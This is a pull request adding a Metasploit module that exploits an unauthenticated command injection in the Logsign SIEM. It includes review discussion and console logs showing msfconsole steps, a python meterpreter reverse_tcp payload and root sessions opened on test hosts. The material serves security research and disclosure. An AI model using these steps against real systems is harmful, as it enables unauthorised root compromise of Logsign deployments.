### PR TITLE
Add Module Logsign Remote Code Execution

### PR DESCRIPTION
**Pull request by mdisec**
This module exploits an command injection vulnerability in Logsign. By exploiting this vulnerability, unauthenticated users can execute arbitrary code under the root user.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/linux/http/logsign_exec`
- [x] `set RHOST 12.0.0.10`
- [x] `python/meterpreter/reverse_tcp` is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type. `set LHOST 12.0.0.1`
- [x] `check` and validate that you are seeing `[+] 12.0.0.10:80 The target is vulnerable.`
- [x] `exploit` and then **verify** the `Meterpreter session 1 opened at console.`

Console output:

```
msf > use exploit/linux/http/logsign_exec 
msf exploit(logsign_exec) > set RHOST 12.0.0.10
RHOST => 12.0.0.10
msf exploit(logsign_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(logsign_exec) > check
[+] 12.0.0.10:80 The target is vulnerable.
msf exploit(logsign_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.10
[*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.10:46660) at 2017-03-10 13:05:16 +0300

meterpreter > getuid
Server username: root
meterpreter > 
```

### CODE REVIEW

File: documentation/modules/exploit/linux/http/logsign_exec.md [hunk 1]
```diff
@@ -0,0 +1,78 @@
+## Vulnerable Application
+
+Download the vulnerable version of OVA or ISO file from following URL. I strongly suggest you to choose OVA.
```
Comment (h00die) [inline documentation/modules/exploit/linux/http/logsign_exec.md]: You say ova or ISO but then only list ova

Comment (mmetince) [inline documentation/modules/exploit/linux/http/logsign_exec.md]: Yes, it's possible to download iso from vendor page as well but I haven't tried it against this module. I'll add it anyway

**Comment by wchen-r7** [comment]
Um, this will take a while:

screen shot 2017-03-15 at 11 36 52 am

File: modules/exploits/linux/http/logsign_exec.rb [hunk 2]
```diff
@@ -0,0 +1,77 @@
...
+        Logsign has a publicly accessible endpoint. That endpoint takes a user
+        input and then use it during operating system command execution without
+        proper validation.
+
+        This module was tested against 4.4.2 and 4.4.137 versions.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>'  # author & msf module
```
Comment (wvu-r7) [inline modules/exploits/linux/http/logsign_exec.rb]: You have been killing it with these disclosures, @mmetince. I'm very happy that you're publishing these modules!

File: modules/exploits/linux/http/logsign_exec.rb [hunk 3]
```diff
@@ -0,0 +1,77 @@
...
+        ],
+      'References'      =>
+        [
+          ['URL', 'https://pentest.blog/unexpected-journey-3-visiting-another-siem-and-uncovering-pre-auth-privileged-remote-code-execution/']
```
Comment (wvu-r7) [inline modules/exploits/linux/http/logsign_exec.rb]: And the blog posts have been incredible reads, too.

**Comment by wchen-r7** [comment]
I am having trouble being able to verify this, because I'm stuck here during the installation:

screen shot 2017-03-15 at 2 31 36 pm

And this consumes my CPU usage excessively.

Can someone else please give this PR a try?

**Comment by mmetince** [comment]
@wchen-r7 did you left cpu and memory numbers by default ? The OVA files configured to require 16 gb memory and 4 CPU but feel free to change it. My current configuration is 8 GB ram and 2 CPU and it works like a charm. I believe 4 GB ram will enough as well.

Could you please give try it one more time with %50 RAM of your total memory number with 2-4 CPU ?

File: modules/exploits/linux/http/logsign_exec.rb (hunk 3 above)
Comment (h00die) [inline modules/exploits/linux/http/logsign_exec.rb]: No but really, great read.

**Comment by bwatters-r7** [comment]
## Testing
```
msf exploit(logsign_exec) > show options

Module options (exploit/linux/http/logsign_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    <LOGSIGN_IP>   yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  <MSF_IP>   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(logsign_exec) > check
[+] <LOGSIGN_IP>:80 The target is vulnerable.
msf exploit(logsign_exec) > run

[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] Delivering payload...
[*] Sending stage (38651 bytes) to <LOGSIGN_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4444 -> <LOGSIGN_IP>:54310) at 2017-03-22 11:16:50 -0500

meterpreter > sysinfo
Computer     : customer
OS           : Linux 3.2.0-107-generic #148-Ubuntu SMP Mon Jul 18 20:22:08 UTC 2016
Architecture : x64
Meterpreter  : python/linux
meterpreter > 
```

**Comment by bwatters-r7** [comment]
# Release Notes
This module provides remote exploitation for a command injection vulnerability in Logsign.

**Pull request merged**